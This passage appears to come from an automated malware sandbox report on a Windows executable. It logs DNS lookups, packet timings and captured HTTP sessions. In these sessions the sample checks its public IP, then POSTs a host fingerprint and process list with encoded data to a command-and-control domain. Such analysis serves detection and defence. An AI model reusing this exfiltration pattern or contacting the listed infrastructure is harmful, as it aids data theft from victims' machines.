                                                    Dec 27, 2024 09:07:58.170759916 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.170919895 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.170959949 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.171102047 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.171148062 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.171268940 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.171278000 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.171519995 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.171551943 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.171731949 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.171809912 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.171844959 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.171899080 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.172111034 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.172121048 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.172204018 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.172213078 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.172389984 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.172399998 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.172547102 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.172557116 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.172688007 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.172697067 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.172708035 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.172715902 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.172794104 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.172805071 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.172934055 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.172943115 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.173054934 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.173104048 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.173201084 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.173209906 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.173317909 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.173326969 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.173441887 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.173450947 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.173494101 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.173518896 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.173599958 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.173609018 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.173701048 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.173710108 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.173778057 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.173866987 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.173882008 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.173943043 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.173995972 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.174005032 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.174081087 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.174139023 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:08:00.071604967 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:08:00.071759939 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:08:00.071831942 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:08:00.072026014 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:08:00.191493034 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:08:00.279604912 CET4972780192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:08:00.399108887 CET80497275.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:08:00.399245977 CET4972780192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:08:00.399568081 CET4972780192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:08:00.519089937 CET80497275.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:08:01.966245890 CET80497275.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:08:01.966638088 CET80497275.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:08:01.966696024 CET4972780192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:08:01.968367100 CET4972780192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:08:02.086074114 CET80497275.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:08:02.169538975 CET4973380192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:08:02.288979053 CET80497335.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:08:02.289113998 CET4973380192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:08:02.289453983 CET4973380192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:08:02.408876896 CET80497335.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:08:03.831228018 CET80497335.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:08:03.831362009 CET80497335.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:08:03.831451893 CET4973380192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:08:03.832122087 CET4973380192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:08:03.951570988 CET80497335.101.3.217192.168.2.10

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 27, 2024 09:07:51.041948080 CET5213553192.168.2.101.1.1.1
                                                    Dec 27, 2024 09:07:51.041948080 CET5213553192.168.2.101.1.1.1
                                                    Dec 27, 2024 09:07:51.180608988 CET53521351.1.1.1192.168.2.10
                                                    Dec 27, 2024 09:07:51.595741034 CET53521351.1.1.1192.168.2.10
                                                    Dec 27, 2024 09:07:56.078353882 CET5213853192.168.2.101.1.1.1
                                                    Dec 27, 2024 09:07:56.078437090 CET5213853192.168.2.101.1.1.1
                                                    Dec 27, 2024 09:07:56.423935890 CET53521381.1.1.1192.168.2.10
                                                    Dec 27, 2024 09:07:56.423947096 CET53521381.1.1.1192.168.2.10
                                                    Dec 27, 2024 09:08:00.141405106 CET5214053192.168.2.101.1.1.1
                                                    Dec 27, 2024 09:08:00.141505003 CET5214053192.168.2.101.1.1.1
                                                    Dec 27, 2024 09:08:00.278529882 CET53521401.1.1.1192.168.2.10
                                                    Dec 27, 2024 09:08:00.278548956 CET53521401.1.1.1192.168.2.10
                                                    Dec 27, 2024 09:08:02.029416084 CET5214253192.168.2.101.1.1.1
                                                    Dec 27, 2024 09:08:02.029479980 CET5214253192.168.2.101.1.1.1
                                                    Dec 27, 2024 09:08:02.168514967 CET53521421.1.1.1192.168.2.10
                                                    Dec 27, 2024 09:08:02.168528080 CET53521421.1.1.1192.168.2.10

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Dec 27, 2024 09:07:51.041948080 CET192.168.2.101.1.1.10x9fd3Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                    Dec 27, 2024 09:07:51.041948080 CET192.168.2.101.1.1.10xf35eStandard query (0)httpbin.org28IN (0x0001)false
                                                    Dec 27, 2024 09:07:56.078353882 CET192.168.2.101.1.1.10xf4c6Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                    Dec 27, 2024 09:07:56.078437090 CET192.168.2.101.1.1.10xbdbeStandard query (0)home.fiveth5ht.top28IN (0x0001)false
                                                    Dec 27, 2024 09:08:00.141405106 CET192.168.2.101.1.1.10xbbddStandard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                    Dec 27, 2024 09:08:00.141505003 CET192.168.2.101.1.1.10x8df2Standard query (0)home.fiveth5ht.top28IN (0x0001)false
                                                    Dec 27, 2024 09:08:02.029416084 CET192.168.2.101.1.1.10x1043Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                    Dec 27, 2024 09:08:02.029479980 CET192.168.2.101.1.1.10x81dbStandard query (0)home.fiveth5ht.top28IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Dec 27, 2024 09:07:51.595741034 CET1.1.1.1192.168.2.100x9fd3No error (0)httpbin.org3.218.7.103A (IP address)IN (0x0001)false
                                                    Dec 27, 2024 09:07:51.595741034 CET1.1.1.1192.168.2.100x9fd3No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                    Dec 27, 2024 09:07:56.423947096 CET1.1.1.1192.168.2.100xf4c6No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false
                                                    Dec 27, 2024 09:08:00.278548956 CET1.1.1.1192.168.2.100xbbddNo error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false
                                                    Dec 27, 2024 09:08:02.168514967 CET1.1.1.1192.168.2.100x1043No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • httpbin.org
                                                    • home.fiveth5ht.top

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.10497165.101.3.217807464C:\Users\user\Desktop\NWJ4JvzFcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 27, 2024 09:07:56.545938015 CET12360OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                    Host: home.fiveth5ht.top
                                                    Accept: */*
                                                    Content-Type: application/json
                                                    Content-Length: 558871
                                                    Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 30 38 35 39 31 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                    Data Ascii: { "ip": "8.46.123.189", "current_time": "8468739163627085912", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe" [TRUNCATED]
                                                    Dec 27, 2024 09:07:56.665601969 CET2472OUTData Raw: 72 44 62 5c 2f 41 49 49 7a 5c 2f 73 62 35 49 44 66 46 77 63 6b 63 65 4f 74 4f 5c 2f 77 44 5a 76 43 78 71 71 5c 2f 38 41 77 52 6f 5c 2f 59 37 77 43 4a 5c 2f 69 2b 4d 67 39 50 48 4f 6b 39 74 33 39 37 77 69 66 53 76 35 79 58 30 35 66 43 5a 5c 2f 38
                                                    Data Ascii: rDb\/AIIz\/sb5IDfFwckceOtO\/wDZvCxqq\/8AwRo\/Y7wCJ\/i+Mg9PHOk9t397wifSv5yX05fCZ\/8ANO+Iv\/hp4Z9f+iu8z+rf+Kc3jd\/0VPhX\/wCHvi7\/AOgc\/lGqOTt+P9K\/cb9p3\/glroOg6B8SdW\/Z2l8Ralqnwx8W22nXXhbxDqMer6t4k8P3fw38A+MJp9OuYLOwhfWdP1HxJqixWMVnF9v05beCEPqF
                                                    Dec 27, 2024 09:07:56.665637016 CET2472OUTData Raw: 54 38 66 36 47 72 64 52 73 33 59 66 69 66 38 4b 31 68 74 38 5c 2f 30 52 32 55 2b 76 79 5c 2f 55 70 31 48 4a 32 5c 2f 48 2b 6c 54 76 31 5c 2f 44 2b 70 70 6c 57 61 46 65 6f 35 42 39 39 5c 2f 78 48 5c 2f 31 36 73 79 66 63 62 36 56 46 51 64 42 58 71
                                                    Data Ascii: T8f6GrdRs3Yfif8K1ht8\/0R2U+vy\/Up1HJ2\/H+lTv1\/D+pplWaFeo5B99\/xH\/16syfcb6VFQdBXqvJ\/sJux\/nvVyTt+P9Krfdbvj+h\/z+lB1Uun+H\/IZ02fx9P6\/wCfx792N91\/qP5LU277\/wDB\/n\/PXp1PSmUGxTP\/ACz\/AA\/pUD9Px\/oau7G9P5f41DIrnYfv\/wCf59vb8aC4b\/L9UUyv9xP\/AC
                                                    Dec 27, 2024 09:07:56.665671110 CET2472OUTData Raw: 30 58 2b 58 72 32 4e 56 6c 6b 4b 73 6a 76 5c 2f 77 42 4f 5c 2f 76 50 5c 2f 41 4d 66 58 31 36 5c 2f 53 72 50 6c 75 33 38 66 6e 4a 4a 5c 2f 79 30 36 66 54 4f 4f 4b 61 38 66 7a 62 45 66 7a 6b 45 76 66 5c 2f 41 4a 59 5c 2f 5c 2f 71 5c 2f 2b 76 39 51
                                                    Data Ascii: 0X+Xr2NVlkKsjv\/wBO\/vP\/AMfX16\/SrPlu38fnJJ\/y06fTOOKa8fzbEfzkEvf\/AJY\/\/q\/+v9QCMSP5j7\/MOP8Alp5pgx\/P\/PHNDMfL+dI4Ull83zI+3\/1v884oWZfLTZ87mIRfvJf3\/wDpg9P8+gFB+79+N0\/5a+XL5Ge\/bP5j0+lABJ8v303\/APbXk\/55qtHJ5e\/99v8Ap+4g9\/8AJ4+tWW2N\/sP\
                                                    Dec 27, 2024 09:07:56.665690899 CET2472OUTData Raw: 73 6d 70 57 56 6e 66 32 33 6d 2b 54 65 57 74 76 63 4a 4a 45 6e 51 48 34 39 66 46 50 50 5c 2f 41 43 5a 56 2b 30 31 67 44 48 5c 2f 49 31 66 73 62 65 78 4a 78 5c 2f 77 41 4e 61 2b 6e 50 31 50 35 5c 2f 41 5c 2f 6a 62 39 75 4c 77 76 2b 78 4a 5c 2f 77
                                                    Data Ascii: smpWVnf23m+TeWtvcJJEnQH49fFPP\/ACZV+01gDH\/I1fsbexJx\/wANa+nP1P5\/A\/jb9uLwv+xJ\/wAEzP2VfEoOn6x8WPF\/7MXwT0T4TeDbqTeNR1xfhL4T8\/xJrVtFNFd\/8Il4WWaC91donhbULqTTdAgurK41eO\/tPbf2QP8Agoz8Kv2gf2VNd+PPjnWtI8E658H9DY\/HzR97+X4c1KwsnuE1vR7EtNqF1oPjJI
                                                    Dec 27, 2024 09:07:56.665767908 CET2472OUTData Raw: 2f 2b 76 55 64 66 33 57 66 77 50 37 54 79 5c 2f 48 5c 2f 41 49 42 48 35 66 76 2b 6e 5c 2f 31 36 6a 71 78 52 51 61 48 39 68 76 37 48 58 78 53 73 66 67 5c 2f 5c 2f 41 4d 45 34 76 32 65 5c 2f 47 39 5c 2f 34 62 38 54 2b 4d 42 39 6c 38 49 65 44 64 4d
                                                    Data Ascii: /+vUdf3WfwP7Ty\/H\/AIBH5fv+n\/16jqxRQaH9hv7HXxSsfg\/\/AME4v2e\/G9\/4b8T+MB9l8IeDdM8L+DR4b\/4STXfEnxN+OMfwx8Kabp0njDxH4Q8MW\/2jxP4u0hby81vxLpFhZWH2q7muv3Ijk+jW+PfxTP8AzZT+01gHJ\/4qv9jXn0H\/ACdtj\/PtXw58EHz\/AMEyP2TOp\/4vb+yCMc4+X9v74Wj0A7etcr\/
                                                    Dec 27, 2024 09:07:56.665807009 CET2472OUTData Raw: 79 5c 2f 6c 54 47 47 36 52 33 32 52 34 5c 2f 77 41 5c 2f 68 7a 7a 5c 2f 41 50 72 6f 4e 43 74 74 33 52 38 6e 79 2b 30 55 58 6d 5c 2f 38 76 48 34 5c 2f 30 37 39 71 68 62 35 46 52 33 54 4b 64 66 4d 38 72 38 66 5c 2f 41 4e 56 57 6b 4f 33 39 33 5c 2f
                                                    Data Ascii: y\/lTGG6R32R4\/wA\/hzz\/AProNCtt3R8ny+0UXm\/8vH4\/079qhb5FR3TKdfM8r8f\/ANVWkO393\/0y83zOf8\/56Ujf6z\/YMX+rjz\/nt3oNKfX5fqVtv8fT08yX8arN\/C+Yw\/8Arf8AP8\/8mrLLu4HzvxFFJ1877H6fh+VMaPl\/4\/8AP59f0oOj2nl+P\/AK3zyNJCnmO\/8Ayy8s\/v5rj\/P+eQKJG3fc\/f
                                                    Dec 27, 2024 09:07:56.665863991 CET2472OUTData Raw: 30 71 66 61 2b 63 76 36 2b 59 45 50 79 52 37 48 5c 2f 65 66 75 5c 2f 77 42 37 6d 54 5c 2f 55 54 66 35 5c 2f 72 52 4a 38 72 66 36 76 5c 2f 57 53 5c 2f 76 66 38 41 6c 68 5c 2f 6e 30 6f 38 74 4e 32 7a 5a 38 38 6b 58 5c 2f 4c 50 5c 2f 41 4a 59 35 50
                                                    Data Ascii: 0qfa+cv6+YEPyR7H\/efu\/wB7mT\/UTf5\/rRJ8rf6v\/WS\/vf8Alh\/n0o8tN2zZ88kX\/LP\/AJY5P+c\/Wntvj37v3n73zZvLi\/13+fp3z6Ue185f18zoP3mks4ZB8k2x\/wDnnIfr+Gf88VRk0+X+4dvOOB39yf6E1Y\/j\/wCBf1qysj\/wP\/n3\/wDr1if5H+0qU7a\/ev60+R9KfsoaJYeKvEfxD+HevI50fx38N
                                                    Dec 27, 2024 09:07:56.665901899 CET2472OUTData Raw: 64 36 39 72 4c 72 5c 2f 41 49 41 38 65 65 47 64 5a 2b 48 58 78 63 38 44 47 5a 49 62 62 78 76 38 4f 50 46 4e 73 31 6a 72 6d 6c 72 4a 4e 48 4e 44 5a 61 37 70 77 65 4c 58 66 43 4f 74 6d 47 53 54 51 76 46 47 6d 61 56 71 50 6c 33 46 74 46 64 57 64 31
                                                    Data Ascii: d69rLr\/AIA8eeGdZ+HXxc8DGZIbbxv8OPFNs1jrmlrJNHNDZa7pweLXfCOtmGSTQvFGmaVqPl3FtFdWd1\/T+f8AggJ+xuP+al\/tMfh4x+Fp\/wDeNU0\/8EBf2Oe3xJ\/aY\/Hxj8Lf\/nNV5Fb6VP0f6+UVMhms5jlFWhLDPBUeHK1GjTpyfOpUfZVYSo1qdX9\/SxFJxr0sTGOIp1I1oxqH7nR+ir9IGhm9LPoyyaWbU68
                                                    Dec 27, 2024 09:07:56.666049004 CET4944OUTData Raw: 4b 6b 73 50 66 6c 75 6f 56 5a 58 63 6f 32 5c 2f 32 45 38 5a 66 41 5c 2f 78 4e 38 56 49 65 47 2b 59 38 4a 5c 2f 55 4b 32 51 59 44 77 77 34 53 77 56 58 44 59 37 4e 34 34 47 45 63 34 70 78 7a 43 76 58 72 78 77 73 34 79 6a 4f 58 31 4c 47 34 4f 45 63
                                                    Data Ascii: KksPfluoVZXco2\/2E8ZfA\/xN8VIeG+Y8J\/UK2QYDww4SwVXDY7N44GEc4pxzCvXrxws4yjOX1LG4OEcS1zW56UbJS5v5mPA\/xje6+CXjj9nLxzdNceCtT1aL4l\/DG+uAJX8AfFzRbG4tHNnIwDQeHviX4fluvB\/iW2aa3sLTWW8J+LrqaC28O6nHqP8ASZ\/wRM\/aI8fftE3Xxk1D4j3P9q+Ifhb8J\/2YPg\/F4jmnl
                                                    Dec 27, 2024 09:07:56.785113096 CET2472OUTData Raw: 38 65 71 71 34 62 45 78 71 30 61 73 62 50 61 63 4a 4c 58 7a 50 45 79 76 47 63 52 5a 42 6a 61 4f 61 35 4a 69 73 36 79 58 4d 63 4c 4a 53 77 2b 5a 5a 58 57 78 32 58 59 33 44 7a 62 56 6e 52 78 6d 45 6c 52 72 30 5a 4e 38 74 6e 43 70 46 74 32 74 30 50
                                                    Data Ascii: 8eqq4bExq0asbPacJLXzPEyvGcRZBjaOa5Jis6yXMcLJSw+ZZXWx2XY3DzbVnRxmElRr0ZN8tnCpFt2t0Ptbwz+2n8WtE06fStWuo\/ElhPayWzJeyCObDoUD\/AGieC\/aPy85WK1W1hAG0xkbdvhnij4s+MPFryrf6ncRWMhbGnxzNBaBT0V4YBDBMQDtEkkO\/Gctlm3eTaBqWk+KfGXw\/8B6J4h8Lt4h+JfxB8F\/DTw0L
                                                    Dec 27, 2024 09:08:00.071604967 CET157INHTTP/1.1 200 OK
                                                    Server: nginx/1.22.1
                                                    Date: Fri, 27 Dec 2024 08:07:59 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Length: 1
                                                    Connection: close
                                                    Data Raw: 30
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.10497275.101.3.217807464C:\Users\user\Desktop\NWJ4JvzFcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 27, 2024 09:08:00.399568081 CET98OUTGET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1
                                                    Host: home.fiveth5ht.top
                                                    Accept: */*
                                                    Dec 27, 2024 09:08:01.966245890 CET372INHTTP/1.1 404 NOT FOUND
                                                    Server: nginx/1.22.1
                                                    Date: Fri, 27 Dec 2024 08:08:01 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Length: 207
                                                    Connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                    Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.10497335.101.3.217807464C:\Users\user\Desktop\NWJ4JvzFcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 27, 2024 09:08:02.289453983 CET171OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                    Host: home.fiveth5ht.top
                                                    Accept: */*
                                                    Content-Type: application/json
                                                    Content-Length: 31
                                                    Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                    Data Ascii: { "id1": "0", "data": "Done1" }
                                                    Dec 27, 2024 09:08:03.831228018 CET372INHTTP/1.1 404 NOT FOUND
                                                    Server: nginx/1.22.1
                                                    Date: Fri, 27 Dec 2024 08:08:03 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Length: 207
                                                    Connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                    Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.10497053.218.7.1034437464C:\Users\user\Desktop\NWJ4JvzFcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-27 08:07:53 UTC52OUTGET /ip HTTP/1.1
                                                    Host: httpbin.org
                                                    Accept: */*
                                                    2024-12-27 08:07:53 UTC224INHTTP/1.1 200 OK
                                                    Date: Fri, 27 Dec 2024 08:07:53 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 31
                                                    Connection: close
                                                    Server: gunicorn/19.9.0
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Credentials: true
                                                    2024-12-27 08:07:53 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                    Data Ascii: { "origin": "8.46.123.189"}


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    System Behavior

                                                    General

                                                    Target ID:4
                                                    Start time:03:07:46
                                                    Start date:27/12/2024
                                                    Path:C:\Users\user\Desktop\NWJ4JvzFcs.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\NWJ4JvzFcs.exe"
                                                    Imagebase:0xbe0000
                                                    File size:4'522'496 bytes
                                                    MD5 hash:91D22C615A675708FAD7DDB68A64CF3F
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:0.3%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:4
                                                      Total number of Limit Nodes:1
                                                      execution_graph 6403 7940000 6404 7940023 6403->6404 6405 79403d0 GetLogicalDrives 6404->6405 6406 79403f1 6404->6406 6405->6404

                                                      Executed Functions

                                                      Function 07920C3A Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5af4823ab166b14176e2491db2f60ff92aa0803c706926c8d0444738c0d3b987
